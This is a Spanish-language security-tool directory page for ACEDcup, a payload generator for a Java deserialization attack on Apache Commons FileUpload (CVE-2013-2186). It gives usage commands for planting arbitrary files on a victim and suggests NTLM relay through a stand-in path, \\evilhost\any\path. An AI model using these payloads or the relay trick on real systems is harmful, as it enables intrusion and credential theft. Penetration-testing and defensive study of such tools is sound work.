Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
ACEDcup — Generador de payloads para ataque de deserialización binaria de Java con Commons FileUpload (CVE-2013-2186) | Kitploit
Herramientas/GitHubGitHub/grrrdog/acedcup
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubgrrrdog/acedcup

ACEDcup

Generador de payloads para ataque de deserialización binaria de Java con Commons FileUpload (CVE-2013-2186)

Ver Repositorio
3714hace 10 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

ACEDcup

La herramienta ACEDcup es un generador de payloads para el ataque de deserialización binaria de Java (ACED)

Para Apache Commons FileUpload ver <= 1.3 (CVE-2013-2186) y Oracle JDK ver < 7u40

El ataque funciona incluso con versiones más recientes de la librería o de Java. Podemos subir cualquier contenido en cualquier directorio, pero no podemos controlar el nombre del archivo (algo así como upload_f71d3547_72ed_4ae1_90fe_0d319115cd42_00000000.tmp) en esta situación. Sin embargo, puede ser útil en algunos casos.

También podemos realizar un ataque de NTLM-relay/sniffing (usando \\evilhost\any\path) si tu objetivo está en un sistema Windows.

Uso

root@kitploit:~
  1)At first, we create a serialized payload:
  java -jar aced_cup.jar /path/payload /path/target /path/out 1
  
  /path/payload - a path to a file with your payload
  /path/target - a path to a file that will be created in your victim (this will be stored in the serialized payload)
  /path/out - a path to a file with serialized payload
  0 - turn off null-byte ending if you attack a patched system (with null-byte- by default)

  2)Then we set the serialized payload to the serialized reader (if we want to test the vuln on your host) :
  java -jar ser_reader serialized_payload.txt
  
  ser_reader tries to deserialize the payload and because of a vulnerability in it's library, it creates a new file in the directory specified.

Ejemplo

java -jar aced_cup.jar D:\\cup_exploit\\payload.txt /home/user/test/any_name.txt D:\\cup_exploit\\serialized_payload.txt

```java -jar ser_reader D:\cup_exploit\serialized_payload.txt````

Descargar herramienta